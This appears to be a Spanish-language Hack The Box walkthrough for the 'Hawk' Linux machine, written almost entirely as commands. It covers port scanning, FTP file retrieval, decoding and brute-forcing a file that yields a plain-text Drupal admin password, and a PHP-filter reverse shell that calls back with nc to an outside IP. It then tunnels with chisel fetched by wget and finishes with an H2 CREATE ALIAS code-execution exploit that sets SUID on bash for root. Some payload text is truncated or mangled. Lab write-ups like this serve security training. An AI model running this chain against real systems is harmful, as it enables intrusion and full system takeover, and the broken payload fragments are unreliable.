Hawk
HTB Linux
mkdir hawk cd !$ mkt cd nmap nmap -p- —open -T5 -v -n 10.129.95.193

nmap -p- -sS —min-rate 5000 —open -vvv -n -Pn 10.129.95.193 -oG allPorts
extractPorts allPorts
nmap -sCV -p80,21,22,5435,8082,9092 10.129.95.193 -oN targeted
whatweb http://10.129.95.193

ftp 10.129.95.193
get .drupal.txt.enc

cat .drupal.txt.enc

cat .drupal.txt.enc | xargs | tr -d ” | base64 -d > drupal.txt

./bruteforce.sh

cat drupal.txt
Encontramos que la contrasena es PencilKeyboardScanner123

Vamos a http://10.129.95.193:8082

Metemos las credenciales admin:PencilKeyboardScanner123

Ya en drupal vamos a modules y escogemos PHP filter.

Escribimos el script de un reverse shell
&1|nc 10.10.14.108 443 >/tmp/f "); ?>Y escogemos PHP code como formato de texto

git clone https://github.com/jpillora/chisel

go build -ldflags “-s -w” .
du -hc chisel

python3 -m http.server 80
wget http://10.10.14.108/chisel

chmod +x chisel

En la maquina kali
./chisel server —reverse -p 1234
En la maquina atacada
./chisel client 10.10.14.108:1234 R:8082:127.0.0.1:8082

Vamos a la pagina localhost:8082. Cambiamos el URL de test a otro nombre y le damos click a Preferences

Escogemos la opcion de Allow connections from other computers

Ya deberia de cambiar el url de test a otro nombre. Aqui puse uno. Le damos click a Connect

ps -faux | grep -i h2-l

Vemos el siguiente exploit: https://www.exploit-db.com/exploits/45506
CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(“\\A”); return s.hasNext() ? s.next() : ""; }$$ CALL EXECVE(‘chmod 4775 /bin/bashc’) Lo corremos y ya deberiamos de tener un root shell.
